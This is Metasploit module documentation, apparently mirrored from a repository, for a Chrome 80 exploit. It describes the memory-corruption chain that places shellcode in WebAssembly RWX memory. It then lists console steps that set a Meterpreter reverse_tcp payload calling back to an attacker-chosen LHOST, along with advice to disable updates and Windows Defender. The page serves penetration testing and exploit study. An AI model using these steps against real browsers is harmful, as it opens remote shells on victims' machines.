Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/documentation/modules/exploit/multi/browser/chrome_jscreate_sideeffect.md
Views: 11789
This module exploits an issue in Google Chrome 80.0.3987.87 (64 bit). The exploit corrupts the length of a float array (float_rel), which can then be used for out of bounds read and write on adjacent memory. The relative read and write is then used to modify a UInt64Array (uint64_aarw) which is used for read and writing from absolute memory. The exploit then uses WebAssembly in order to allocate a region of RWX memory, which is then replaced with the payload shellcode.
The payload is executed within the sandboxed renderer process, so the browser must be run with the --no-sandbox option for the payload to work correctly.
Vulnerable Application
The module is compatible with any 64bit Google Chrome (version 80), on any platform (macOS, Linux or Windows), however the code that writes the shellcode into the rwx region (wasm_rwx_addr) may need to be modified for different versions.
Vulnerable Application Installation Steps
You can download a vulnerable Chrome version from this location: https://www.filepuma.com/download/google_chrome_64bit_80.0.3987.87-24545/
You should ensure that application does not update itself to the latest version (by disabling automatic updates or simply not connecting to the internet). You may also need to disable Windows Defender.
Verification Steps
Do:
use exploit/multi/browser/chrome_jscreate_sideeffectDo:
set payload windows/x64/meterpreter/reverse_tcpDo:
set LHOST [IP]Do:
set SRVHOST [IP]Do:
set URIPATH / [PATH]Do:
run
Scenarios
Windows 10 and Google Chrome 80.0.3987.87 with --no-sandbox
Start Google Chrome without a sandbox:
"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-sandbox